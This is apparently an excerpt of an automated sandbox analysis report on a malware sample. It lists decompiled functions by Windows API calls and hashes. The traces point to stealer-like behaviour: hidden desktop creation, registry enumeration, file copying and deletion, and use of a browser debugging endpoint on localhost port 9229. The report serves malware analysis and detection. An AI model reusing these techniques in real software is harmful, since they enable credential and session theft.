                                                    • Opcode ID: 036bfe3e640b0c580a25b4da69415942ed3f07c3761777f5e0f98e8c3392593a
                                                    • Instruction ID: 4a9b4c3bee5e647b237dfc927a1b2dd912ecee08ce7a36b9443ddbe188e3dd31
                                                    • Opcode Fuzzy Hash: 036bfe3e640b0c580a25b4da69415942ed3f07c3761777f5e0f98e8c3392593a
                                                    • Instruction Fuzzy Hash: E2915EB1614340AFD720EF64DC45FAE77E9AF88704F10891EFA4987290DBB0A505CBA2
                                                    Function 02489A07 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 235stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcat.KERNEL32(?,?), ref: 02489A3F
                                                    • lstrcat.KERNEL32(?,?), ref: 02489A54
                                                    • lstrcat.KERNEL32(?,0043516C), ref: 02489A67
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A40AC
                                                      • Part of subcall function 024A4077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024A40D6
                                                      • Part of subcall function 024A4077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02481495,?,0000001A), ref: 024A40E0
                                                    • wsprintfA.USER32 ref: 02489AAD
                                                    • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 02489AD0
                                                    • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 02489AEF
                                                    • memset.MSVCRT ref: 02489B0D
                                                    • lstrcat.KERNEL32(?,?), ref: 02489B22
                                                    • lstrcat.KERNEL32(?,?), ref: 02489B34
                                                    • lstrcat.KERNEL32(?,00435128), ref: 02489B44
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02489B81
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02489BB7
                                                    • StrStrA.SHLWAPI(?,00638C5C), ref: 02489BCC
                                                    • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 02489BE9
                                                    • lstrlen.KERNEL32(?), ref: 02489BFD
                                                    • wsprintfA.USER32 ref: 02489C0D
                                                    • lstrcpy.KERNEL32(?,?), ref: 02489C24
                                                    • memset.MSVCRT ref: 02489C3A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$Desktopmemsetwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
                                                    • String ID: D
                                                    • API String ID: 171495903-2746444292
                                                    • Opcode ID: 310418aebbb9667b23ffe003a4651859814da30904e8aad52300771c551470ab
                                                    • Instruction ID: 6a210b58decdcf7b3210da5d3c9159877a7a6597a27e01c311ee583e39ed96a4
                                                    • Opcode Fuzzy Hash: 310418aebbb9667b23ffe003a4651859814da30904e8aad52300771c551470ab
                                                    • Instruction Fuzzy Hash: 0C914EB1614340AFD720EF64DC45FAE77E9AF88704F10891EFA4987291DBB09505CBA6
                                                    Function 00421800 Relevance: 37.8, APIs: 25, Instructions: 269stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
                                                    • lstrlenA.KERNEL32(009254F0,00000000,00000000,?,?,00421B61), ref: 00421840
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
                                                    • lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
                                                    • lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F
                                                    • lstrlenA.KERNEL32(00925580,?,?,00421B61), ref: 00421925
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0042194C
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00421957
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00421986
                                                    • lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 00421998
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004219B9
                                                    • lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004219C5
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004219F4
                                                    • lstrlenA.KERNEL32(009254A0,?,?,00421B61), ref: 00421A0A
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A31
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00421A3C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00421A6B
                                                    • lstrlenA.KERNEL32(009254C0,?,?,00421B61), ref: 00421A81
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AA8
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 00421AB3
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00421AE2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcatlstrlen
                                                    • String ID:
                                                    • API String ID: 1049500425-0
                                                    • Opcode ID: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
                                                    • Instruction ID: 274b4ab71ddff461c781089cdb5a89f9d7377c7fda2b54a99ae9043ae0fda87f
                                                    • Opcode Fuzzy Hash: 311b411c21f255103ceab64b58adb14faa11b83e9ac96c1b0ac2e3f17e097d2a
                                                    • Instruction Fuzzy Hash: 84914CB57017039BD720AFB6DD88A17B7E9AF14344B54583EA881D33B1DBB8D841CBA4
                                                    Function 024812D7 Relevance: 36.3, APIs: 24, Instructions: 278stringfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 024812F1
                                                      • Part of subcall function 02481267: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0248127C
                                                      • Part of subcall function 02481267: RtlAllocateHeap.NTDLL(00000000), ref: 02481283
                                                      • Part of subcall function 02481267: RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 024812A0
                                                      • Part of subcall function 02481267: RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 024812BA
                                                      • Part of subcall function 02481267: RegCloseKey.ADVAPI32(?), ref: 024812C4
                                                    • lstrcat.KERNEL32(?,00000000), ref: 02481307
                                                    • lstrlen.KERNEL32(?), ref: 02481314
                                                    • lstrcat.KERNEL32(?,00431D48), ref: 0248132F
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481366
                                                    • lstrlen.KERNEL32(006389F0), ref: 02481374
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02481398
                                                    • lstrcat.KERNEL32(00000000,006389F0), ref: 024813A0
                                                    • lstrlen.KERNEL32(00431D50), ref: 024813AB
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024813CF
                                                    • lstrcat.KERNEL32(00000000,00431D50), ref: 024813DB
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02481401
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02481446
                                                    • lstrlen.KERNEL32(00638CA4), ref: 02481455
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0248147C
                                                    • lstrcat.KERNEL32(00000000,?), ref: 02481484
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024814BF
                                                    • lstrcat.KERNEL32(00000000), ref: 024814CC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024814F3
                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0248151C
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02481548
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02481584
                                                      • Part of subcall function 0249F197: lstrcpy.KERNEL32(00000000,?), ref: 0249F1C9
                                                    • DeleteFileA.KERNEL32(?), ref: 024815B8
                                                    • memset.MSVCRT ref: 024815D5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocateCloseCopyDeleteOpenProcessQueryValue
                                                    • String ID:
                                                    • API String ID: 1397529057-0
                                                    • Opcode ID: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
                                                    • Instruction ID: ba6dd6ed9d934af88336fc0094673bf167eb8e90a08850596e80fa1d6eeb7de5
                                                    • Opcode Fuzzy Hash: 310d5bf42af13474714d64ac2762bf7d39da0fa1acd6f8eb4d61c63547e0b073
                                                    • Instruction Fuzzy Hash: 81A19571A21255ABDB21FF75CC88E9F7BBAAF44704F04442AE809E7250DB74D942DFA0
                                                    Function 00418D00 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 174stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(?,block,?,?,?,?,0042081F), ref: 00418D1A
                                                    • ExitProcess.KERNEL32 ref: 00418D27
                                                    • strtok_s.MSVCRT ref: 00418D39
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExitProcessstrtok_s
                                                    • String ID: block
                                                    • API String ID: 3407564107-2199623458
                                                    • Opcode ID: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
                                                    • Instruction ID: d61f0b7eaf725463d85374e156b8a22592a45d2bf89fa87c178f2814d4d341aa
                                                    • Opcode Fuzzy Hash: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
                                                    • Instruction Fuzzy Hash: 675160B1A047019FC7209F75EC88AAB77F6EB48704B10582FE452D7660DBBCD4828F69
                                                    Function 0249AE79 Relevance: 31.5, APIs: 25, Instructions: 297stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32 ref: 0249AE96
                                                    • lstrlen.KERNEL32(00638DD4), ref: 0249AEAC
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249AED4
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0249AEDF
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249AF08
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249AF4B
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0249AF55
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249AF7E
                                                    • lstrlen.KERNEL32(0043509C), ref: 0249AF98
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249AFBA
                                                    • lstrcat.KERNEL32(00000000,0043509C), ref: 0249AFC6
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249AFEF
                                                    • lstrlen.KERNEL32(0043509C), ref: 0249B001
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249B023
                                                    • lstrcat.KERNEL32(00000000,0043509C), ref: 0249B02F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249B058
                                                    • lstrlen.KERNEL32(00638DB8), ref: 0249B06E
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249B096
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0249B0A1
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249B0CA
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249B106
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0249B110
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249B136
                                                    • lstrlen.KERNEL32(00000000), ref: 0249B14C
                                                    • lstrcpy.KERNEL32(00000000,00638A98), ref: 0249B17F
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$lstrlen
                                                    • String ID:
                                                    • API String ID: 2762123234-0
                                                    • Opcode ID: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
                                                    • Instruction ID: 06d89c0ffcb678c9f07cee09fdb294be7c9c151084d4b93f17a80b3fe843d218
                                                    • Opcode Fuzzy Hash: 9101464e6f8103f87ad889bfc074e9eb7c51b8aa548391c385bb6237e351800d
                                                    • Instruction Fuzzy Hash: D7B15C71911666ABDB22EF75DC88AAF7BB6BF40308F04042AE81597250EBB4D941DF90
                                                    Function 024A1A67 Relevance: 31.5, APIs: 25, Instructions: 269stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 024A1A96
                                                    • lstrlen.KERNEL32(00638DEC), ref: 024A1AA7
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1ACE
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 024A1AD9
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1B08
                                                    • lstrlen.KERNEL32(00435564), ref: 024A1B1A
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1B3B
                                                    • lstrcat.KERNEL32(00000000,00435564), ref: 024A1B47
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1B76
                                                    • lstrlen.KERNEL32(00638B1C), ref: 024A1B8C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1BB3
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 024A1BBE
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1BED
                                                    • lstrlen.KERNEL32(00435564), ref: 024A1BFF
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1C20
                                                    • lstrcat.KERNEL32(00000000,00435564), ref: 024A1C2C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1C5B
                                                    • lstrlen.KERNEL32(00638D70), ref: 024A1C71
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1C98
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 024A1CA3
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1CD2
                                                    • lstrlen.KERNEL32(00638D6C), ref: 024A1CE8
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1D0F
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 024A1D1A
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1D49
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcatlstrlen
                                                    • String ID:
                                                    • API String ID: 1049500425-0
                                                    • Opcode ID: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
                                                    • Instruction ID: 7aabf961189be78ab1bc53f483e7ec388398aa91d4bcaef5d8ceb9e6924df4ad
                                                    • Opcode Fuzzy Hash: 7d047b6832bef589f5634e053af651aa6ff54b82b49a647bfc4f6edddc21a2fc
                                                    • Instruction Fuzzy Hash: 3A9130B0601743ABD720EF79CC98A1BB7EAAF14349F14582EA85AC7350EB74D841DF60
                                                    Function 0249C0E7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 203stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C11A
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0249C14D
                                                    • lstrlen.KERNEL32(004353D4), ref: 0249C158
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249C178
                                                    • lstrcat.KERNEL32(00000000,004353D4), ref: 0249C184
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C1A7
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0249C1B2
                                                    • lstrlen.KERNEL32(0043540C), ref: 0249C1BD
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C1DA
                                                    • lstrcat.KERNEL32(00000000,0043540C), ref: 0249C1E6
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C20D
                                                    • lstrlen.KERNEL32(00435410), ref: 0249C22D
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249C24F
                                                    • lstrcat.KERNEL32(00000000,00435410), ref: 0249C25B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0249C281
                                                    • ShellExecuteEx.SHELL32(?), ref: 0249C2D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                                    • String ID: <
                                                    • API String ID: 4016326548-4251816714
                                                    • Opcode ID: 948e5f2a0fe88fc6292e69687398adab40a5ba38be72b988fe604048f0edeb44
                                                    • Instruction ID: 86c2e6ea30061e07b26e7e980871d58ae72a9252c6940ed1eff1768821b595d9
                                                    • Opcode Fuzzy Hash: 948e5f2a0fe88fc6292e69687398adab40a5ba38be72b988fe604048f0edeb44
                                                    • Instruction Fuzzy Hash: 8D618E70A11295ABDF21FFB5CC88A5F7FA6AF08708F14442BE805E7211DBB4C5429FA4
                                                    Function 004090F0 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 161networkstringfileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 0040910F
                                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 0040912C
                                                    • InternetCloseHandle.WININET(00000000), ref: 00409139
                                                    • strlen.MSVCRT ref: 00409155
                                                    • InternetReadFile.WININET(?,?,?,00000000), ref: 00409196
                                                    • InternetReadFile.WININET(00000000,?,00001000,?), ref: 004091C7
                                                    • InternetCloseHandle.WININET(00000000), ref: 004091D2
                                                    • InternetCloseHandle.WININET(00000000), ref: 004091D9
                                                    • strlen.MSVCRT ref: 004091EA
                                                    • strlen.MSVCRT ref: 0040921D
                                                    • strlen.MSVCRT ref: 0040925E
                                                      • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417EEF
                                                      • Part of subcall function 00417EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 00417F09
                                                      • Part of subcall function 00417EB0: memchr.MSVCRT ref: 00417F28
                                                    • strlen.MSVCRT ref: 0040927C
                                                      • Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
                                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                                    • API String ID: 4166274400-2144369209
                                                    • Opcode ID: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
                                                    • Instruction ID: a7d092efa737f0fe45e53d089a45e304e661b41fe404ce77bc48f3d160830c15
                                                    • Opcode Fuzzy Hash: 0c6aa3a70782f887abaeb98b790b0c8f3578e5d0b449c1f4a755a60c44504834
                                                    • Instruction Fuzzy Hash: AD51C571B00205ABDB20DFA4DC45BDEF7F9DB48714F14416AF904E3281DBB8EA4587A9
                                                    Function 0248B660 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248B687
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B6D5
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B700
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0248B708
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B730
                                                    • lstrlen.KERNEL32(00435214), ref: 0248B7A7
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B7CB
                                                    • lstrcat.KERNEL32(00000000,00435214), ref: 0248B7D7
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B800
                                                    • lstrlen.KERNEL32(00000000), ref: 0248B884
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B8AE
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0248B8B6
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B8DE
                                                    • lstrlen.KERNEL32(0043509C), ref: 0248B955
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B979
                                                    • lstrcat.KERNEL32(00000000,0043509C), ref: 0248B985
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248B9B5
                                                    • lstrlen.KERNEL32(?), ref: 0248BABE
                                                    • lstrlen.KERNEL32(?), ref: 0248BACD
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248BAF5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$lstrcat
                                                    • String ID:
                                                    • API String ID: 2500673778-0
                                                    • Opcode ID: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
                                                    • Instruction ID: c3dbc2d54435531995dcddc48821acca4bc94dfc8a040e31e00f2051b776acdf
                                                    • Opcode Fuzzy Hash: caf0e5c52129c9e0c170800c9da7536f1db1eb5a9e1db09bea434f579a2868c7
                                                    • Instruction Fuzzy Hash: 18022E70A116069FDB25EF65C948A6EBBB2EF4470CF18806ED809DB361D775D842CF90
                                                    Function 024A3967 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 222registrystringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 024A7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 024A7495
                                                    • RegOpenKeyExA.ADVAPI32(?,00638D44,00000000,00020019,?), ref: 024A39C4
                                                    • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 024A39FE
                                                    • wsprintfA.USER32 ref: 024A3A29
                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 024A3A47
                                                    • RegCloseKey.ADVAPI32(?), ref: 024A3A55
                                                    • RegCloseKey.ADVAPI32(?), ref: 024A3A5F
                                                    • RegQueryValueExA.ADVAPI32(?,00638DC0,00000000,000F003F,?,?), ref: 024A3AA8
                                                    • lstrlen.KERNEL32(?), ref: 024A3ABD
                                                    • RegQueryValueExA.ADVAPI32(?,00638BD0,00000000,000F003F,?,00000400), ref: 024A3B2E
                                                    • RegCloseKey.ADVAPI32(?), ref: 024A3B79
                                                    • RegCloseKey.ADVAPI32(?), ref: 024A3B90
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                                    • String ID: - $?
                                                    • API String ID: 13140697-712516993
                                                    • Opcode ID: edf0bac9685c6a4e32c5945965864e6577cf50905678e5db7fdfb665f3f8e1b6
                                                    • Instruction ID: c6319ad92b842c663b52901b2b2ecea667ffe338b1ec51c92780d3eba9bc2094
